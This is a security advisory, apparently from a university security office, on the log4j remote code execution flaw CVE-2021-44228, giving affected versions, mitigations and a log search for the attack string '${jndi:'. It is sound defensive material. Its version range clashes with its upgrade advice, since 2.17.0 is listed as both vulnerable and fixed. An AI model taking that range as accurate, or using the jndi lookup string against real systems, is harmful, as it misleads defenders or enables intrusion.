Critical Vulnerability in log4j (CVE-2021-44228)

December 10, 2021

Updated Dec. 20, 2021

Summary

A critical vulnerability has been found in the widely used Java logging library log4j.  This vulnerability can allow remote code execution by an unauthenticated attacker, is easy to exploit, and proof of concept code is publicly available.

Vulnerable Library

2.0 <= Apache log4j <= 2.17.0

Mitigations

  • Upgrade to the latest log4j version, ≥2.17.0

  • If you are using a version older than 2.17.0 and cannot upgrade, the vulnerability can be mitigated by substituting a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's class loading documentation to understand this behavior.

If you are unable to quickly mitigate this vulnerability on a P3 or P4 system, please open a ticket with ISO by emailing security@berkeley.edu

If you administer a publicly accessible P3 or P4 system that is vulnerable, after mitigation, examine your access and application logs for occurrences of  "${jndi:" .  If any logs are found, please open a ticket with ISO by emailing security@berkeley.edu

References